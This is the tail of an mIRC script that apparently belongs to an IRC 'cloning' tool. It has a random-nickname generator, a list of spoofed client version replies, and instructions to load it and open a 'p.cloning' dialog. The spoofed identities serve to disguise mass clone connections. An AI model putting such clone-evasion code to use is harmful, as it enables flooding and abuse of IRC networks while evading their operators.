If ($1 == 10) { Return $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) }
}
Alias VReply {
If ($1 == 1) { Return mIRC32 v5.9 K.Mardam-Bey }
If ($1 == 2) { Return mIRC32 v5.91 K.Mardam-Bey }
If ($1 == 3) { Return mIRC32 v5.71 K.Mardam-Bey }
If ($1 == 4) { Return mIRC 6.01 Khaled Mardam-Bay }
If ($1 == 5) { Return mIRC 6.02 Khaled Mardam-Bay }
If ($1 == 6) { Return mIRC 6.03 Khaled Mardam-Bay }
If ($1 == 7) { Return mIRC v6.12 Khaled Mardam-Bey }
If ($1 == 8) { Return mIRC v6.14 Khaled Mardam-Bey }
If ($1 == 9) { Return mIRC v6.15 Khaled Mardam-Bey }
If ($1 == 10) { Return mIRC v6.16 Khaled Mardam-Bey }
If ($1 == 11) { Return xchat 1.8.1 Linux 2.4.7-10 [i686/451MHz] }
If ($1 == 12) { Return xchat 2.0.7 Linux 2.6.5-1.358 [i686/3.01GHz] }
If ($1 == 13) { Return xchat 1.8.9 Linux 2.4.9-e.35smp [i686/1667MHz/SMP] }
If ($1 == 14) { Return xchat 2.0.7 Linux 2.6.5-7.104-default [i686/1.41GHz] }
If ($1 == 15) { Return PnP 4.22 - http://www.pairc.com/ }
}

-------------------------------------------------------------------

paste into remote script editor
running command : just type //Dialog -md p.cloning p.cloning

have fun